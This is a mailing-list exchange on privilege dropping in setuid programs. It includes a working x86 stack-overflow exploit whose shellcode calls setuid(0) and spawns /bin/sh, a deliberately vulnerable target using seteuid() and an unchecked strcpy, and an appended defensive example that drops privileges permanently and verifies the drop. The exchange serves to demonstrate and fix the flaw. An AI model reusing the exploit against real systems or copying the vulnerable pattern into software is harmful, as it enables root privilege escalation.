I attached to this mail one vuln.c program and one exploit.c to demonstrate shellcode that calls setuid(0) and gains root privileges...
This technique is a simple demonstration of what I mentioned earlier.
Thank you,
Rodrigo.
Pekka Savola wrote:
> On Wed, 25 Feb 2004, Rodrigo Rubira Branco wrote:
> > Simply calling setuid(getuid()) isn't sufficient, because if an attacker discovers a buffer overflow, it is possible for him to insert a call to setuid in his shellcode and gain root privileges.
>
> Hmm.. I'm not sure I understand what you're referring to? Could you elaborate and provide a patch or description of the "proper" means?
>
> It is assumed that the attacker would only be able to insert shellcode or exploit the system after the privileges have been dropped -- not before that.
>
> Note that setuid(getuid()) is only done if the binary is setuid root. For a regular binary, you'll setuid to the specific account.
--
Rodrigo Rubira Branco
Security & Infrastructure
Firewalls Security Corporation
[EMAIL PROTECTED]
Tel: 55(14) 3234-5665
Cell: 55(14) 9795-1850
Site: http://www.firewalls.com.br

Privacy Notice
The information contained in this e-mail and in the attached files is for the exclusive use of the addressee indicated here, and may contain trade secrets, intellectual property or other confidential information protected by applicable law. If you are not the intended recipient, you are hereby notified that any review, reading, copying and/or disclosure of the contents of this e-mail is strictly prohibited and unauthorized. Please delete the contents of the e-mail and notify the sender immediately.
Thank you for your cooperation.
exploit.c:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define ALIGN 0
#define OFFSET 0
#define RET_POSITION 1024
#define RANGE 20
#define NOP 0x90

/* Linux/x86 shellcode: setuid(0) first, then a shell (the point of the demo) */
char shellcode[]=
"\x31\xc0"
"\x31\xdb"
"\xb0\x17"
"\xcd\x80"
"\xeb\x1f"
"\x5e"
"\x89\x76\x08"
"\x31\xc0"
"\x88\x46\x07"
"\x89\x46\x0c"
"\xb0\x0b"
"\x89\xf3"
"\x8d\x4e\x08"
"\x8d\x56\x0c"
"\xcd\x80"
"\x31\xdb"
"\x89\xd8"
"\x40"
"\xcd\x80"
"\xe8\xdc\xff\xff\xff"
"/bin/sh";

/* current stack pointer, returned in %eax (relies on the compiler not touching %eax afterwards) */
unsigned long get_sp(void)
{
    __asm__("movl %esp,%eax");
}

int main(int argc,char **argv)
{
    char buff[RET_POSITION+RANGE+ALIGN+1],*ptr;
    long addr;
    unsigned long sp;
    int offset=OFFSET,bsize=RET_POSITION+RANGE+ALIGN+1;
    int i;

    if(argc>1)
        offset=atoi(argv[1]);

    sp=get_sp();
    addr=sp-offset;

    /* fill the whole buffer with the guessed address, one 4-byte word at a time */
    for(i=0;i+3<bsize;i+=4)
    {
        buff[i+ALIGN]=(addr&0x000000ff);
        buff[i+ALIGN+1]=(addr&0x0000ff00)>>8;
        buff[i+ALIGN+2]=(addr&0x00ff0000)>>16;
        buff[i+ALIGN+3]=(addr&0xff000000)>>24;
    }

    /* leading NOPs, then the shellcode, then the trailing addresses */
    for(i=0;i<bsize-RANGE*2-strlen(shellcode)-1;i++)
        buff[i]=NOP;

    ptr=buff+bsize-RANGE*2-strlen(shellcode)-1;
    for(i=0;i<strlen(shellcode);i++)
        *(ptr++)=shellcode[i];

    buff[bsize-1]='\0';

    printf("Jump to 0x%08x\n",addr);
    execl("./vuln","vuln",buff,(char *)0);
    return 0;
}
vuln.c:

#include <string.h>
#include <unistd.h>

int main(int argc,char **argv)
{
    char buffer[1024];

    /* seteuid() changes only the effective uid; the saved set-user-id is left untouched */
    seteuid(getuid());

    if(argc>1)
        strcpy(buffer,argv[1]);   /* unchecked copy: the overflow the demo relies on */
    return 0;
}
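The check Pekka asks for, as an added example (not code from this mail or from its author; the function names are my own): a program that drops privileges with setuid() instead of the seteuid() used in vuln.c, and then verifies the drop by trying to get uid 0 back. When the caller's effective uid is 0, POSIX setuid() sets the real, effective and saved uid together; seteuid() sets only the effective uid, which is why the saved uid in vuln.c stays 0 and a later setuid(0) from injected code is still permitted.

```c
#include <errno.h>
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>

/* Returns 1 if uid 0 can no longer be regained by this process, 0 if it
 * still can.  Regaining root is attempted (and undone) rather than assumed,
 * because the saved set-user-id is what decides it and it is not visible
 * through getuid()/geteuid(). */
int root_is_unreachable(void)
{
    if (geteuid() == 0)
        return 0;                  /* nothing has been dropped yet */
    if (seteuid(0) == 0) {
        seteuid(getuid());         /* undo: we only wanted to know */
        return 0;                  /* saved uid was still 0 */
    }
    return errno == EPERM;
}

/* The weak drop from vuln.c, kept for contrast: only the effective uid
 * changes, so root_is_unreachable() reports 0 after it when run as root. */
int drop_effective_only(uid_t target)
{
    return seteuid(target);
}

/* Permanent drop to `target`.  Returns 0 only if real and effective uid are
 * now `target` and, unless target is 0, root can no longer be regained. */
int drop_privileges_permanently(uid_t target)
{
    if (setuid(target) != 0)
        return -1;
    if (getuid() != target || geteuid() != target)
        return -1;
    if (target != 0 && !root_is_unreachable())
        return -1;                 /* saved uid is still 0: drop did not take */
    return 0;
}

int main(void)
{
    uid_t real = getuid();

    if (drop_privileges_permanently(real) != 0) {
        perror("drop_privileges_permanently");
        return 1;
    }
    printf("ruid=%u euid=%u, uid 0 reachable again: %s\n",
           (unsigned)getuid(), (unsigned)geteuid(),
           root_is_unreachable() ? "no" : "yes");
    return 0;
}
```

Run unprivileged it simply reports that uid 0 is not reachable. Run with effective uid 0 (a setuid-root test binary owned by root, started from an ordinary account) the setuid() drop still reports "no", while replacing the setuid() call with the seteuid() of drop_effective_only() makes the program report that uid 0 is reachable again, which is exactly the window the attached exploit uses. The drop itself refuses to report success unless the re-acquisition attempt fails, so a program built this way cannot silently run with a latent root saved uid.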
